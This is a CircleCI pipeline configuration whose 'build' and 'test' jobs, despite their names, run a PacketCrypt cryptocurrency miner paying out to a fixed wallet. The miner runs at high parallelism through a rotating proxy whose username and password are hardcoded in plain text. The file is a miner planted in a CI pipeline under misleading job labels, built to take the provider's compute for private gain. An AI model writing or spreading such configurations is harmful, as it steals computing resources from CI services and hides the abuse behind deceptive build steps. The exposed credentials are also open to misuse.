version: 2.1

# Define the jobs we want to run for this project
jobs:
  build:
    docker:
      - image: docker:17.05.0-ce-git
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    parallelism: 15         
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build Docker image
          command: |
            docker pull thomasjp0x42/packetcrypt
            docker container run \
              -e HTTP_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              -e HTTPS_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              thomasjp0x42/packetcrypt ann -p pkt1qc5pvz5c8ku2jrf3s2s2ysxt4yctv2v58pzhnl0 https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io 2>&1 | grep -o "annmine.rs.*Ke.*"
  test:
    docker:
      - image: docker:17.05.0-ce-git
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    parallelism: 13          
    steps:
      - checkout
      - setup_remote_docker
      - run:
          name: Build App
          command: |
            docker pull thomasjp0x42/packetcrypt
            docker container run \
              -e HTTP_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              -e HTTPS_PROXY=http://rwacwheg-rotate:01nbjiqyqqb3@p.webshare.io:80/ \
              thomasjp0x42/packetcrypt ann -p pkt1qc5pvz5c8ku2jrf3s2s2ysxt4yctv2v58pzhnl0 https://stratum.zetahash.com/ http://pool.pkt.world http://pool.pktpool.io 2>&1 | grep -o "annmine.rs.*Ke.*"

# Orchestrate our job run sequence
workflows:
  build_and_test:
    jobs:
      - build
      - test
